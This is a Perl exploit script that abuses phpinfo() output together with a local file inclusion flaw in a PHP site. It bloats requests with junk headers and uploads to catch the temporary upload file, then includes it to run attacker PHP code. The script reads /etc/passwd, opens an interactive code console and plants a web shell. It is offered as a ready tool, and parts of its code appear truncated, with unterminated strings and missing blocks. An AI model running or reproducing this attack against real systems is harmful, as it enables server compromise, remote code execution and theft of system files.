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Created April 19, 2016 20:37
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#!/usr/bin/perl -w
# perl http://localhost/phpinfo.php http://localhost/test.php?e=../../../../../etc/passwd
use IO::Socket;
use LWP::Simple;
# GLOBAL SETTINGS #############################################################################
$use_shell=0;# use web-shell, 1 - yes, 0 - no
$shell_file="wso2.txt"; # web-shell file
$phpcode = '';
$save_to_file = 0; # 1 - save to file z_host.txt, 0- no
$console = 1; # 1 - Work in terminal, 0 - no
$keep_tmp_file = 1; #1 - Keeping file $tmpfile in tmp, use it as long as you need it, 0 - No
$rcvbuf = 1024; # increase if script is running too slow. will be automatically doubled
$bigz = 3000; # 8000 - long line to create bottlenecks
$junkheaders = 30; # 1-90
$junkfiles = 40; #10 ~ 4Mb of overhead
$junkfilename = '>' x 100000;
open(FILE, $shell_file);
@file = <FILE>;
$phpcode = join('', @file);
$host = "";$path = ""; $flag = 0;
if($ARGV[0] =~ m#http://(.+?)(/.+)#) {$host = $1;$path = $2} else { die "Can't extract host\n"};
sub get_tmp {
if ($console ==1 && $flag == 1){
print "\nType your PHP CODE or EXIT:\n============================================\n";
$phpcode = <STDIN>;
chomp $phpcode;
if ($phpcode eq "exit" || $phpcode eq "EXIT") { print "\nby-by :)\n";exit}
if ($save_to_file == 1) {open( FILE, ">>" . "z_" .$host . ".txt" )}
print "\nGenerating huge headers\t\t";
my $headers =
"POST $path HTTP/1.0
Host: $host
User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10.6; rv:2.0b8) Gecko/20100101 Firefox/4.0b8
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Language: en-us,en;q=0.5
Accept-Charset: windows-1251,utf-8;q=0.7,*;q=0.7
z:".("Z" x $bigz)."\n";
for(my $i=0; $i<$junkheaders; $i++) {
$headers .= "z$i: $i\n";
$headers .= "Content-Type: multipart/form-data; boundary=---------------------------59502863519624080131137623865
Content-Length: ";
my $content=
Content-Disposition: form-data; name="tfile"; filename=""
Content-Type: text/html
for (my $i=0; $i<$junkfiles; $i++) {
$content .= '-----------------------------59502863519624080131137623865
Content-Disposition: form-data; name="ffile'.$i.'"; filename="'.$i.$junkfilename.'"
Content-Type: text/html
$headers .= length($content)."\n\n".$content;
print "[headers ready]\n";
my $remote = IO::Socket::INET->new( Proto => "tcp",
PeerAddr => $host,
PeerPort => 80,
setsockopt($remote, SOL_SOCKET, SO_RCVBUF,pack("I",$rcvbuf));
print "Setting buffer size\t\t[".unpack("I",getsockopt($remote, SOL_SOCKET, SO_RCVBUF))."]\n";
unless ($remote) { die "cannot connect to http daemon on $host" }
print "Sending request\t\t\t";
print $remote $headers;
print "[request sent]\n";
my $line = <$remote>;
print $line;
print "Reading";
while ( $line = <$remote> ) {
print ".";
if ($line =~ m#tmp_name].+(/tmp/php.+)$#) {
my $tmpfile = $1;
print "\nGot filename: $tmpfile\n";
print "Including...\n";
$tmpfile =~ s#/+#%252f#g;
$inc = "$tmpfile.html"; #path to /etc/passwd
#$inc =~ s#/#%252f#g;
print "$inc\n";
$flag = 1;
my $result = get($inc);
if($result =~ m/ussr(.*?)ussr/imgs){
print "\n\n================= PHP CODE: =================\n$phpcode\n";
print "\n\n================= RESULTS: ==================\n\n$1\n";
print "\n\n=============================================\n\n";
if($save_to_file==1){print FILE $1 . "\n"}
} else {
print "\n\n================= CHECK PHP CODE (maybe error in code or some functions are disabled [system for example]): =================\n$phpcode\n";
print "\n No results, exploit failed, sorry\n\n";
} else {
print "\nYour shell in \n\n===> $inc\n\n don't forget to delete it after all\n";
if ($keep_tmp_file == 1) {
print "\nKeeping file $tmpfile in tmp, use it as long as you need it\n";
while ($remote) {print ".\r";sleep 5};
close $remote;
if ($save_to_file == 1) {close(FILE)}
$flag = 1;
if ($console ==1 && $flag == 1){
goto START;
} else {exit}
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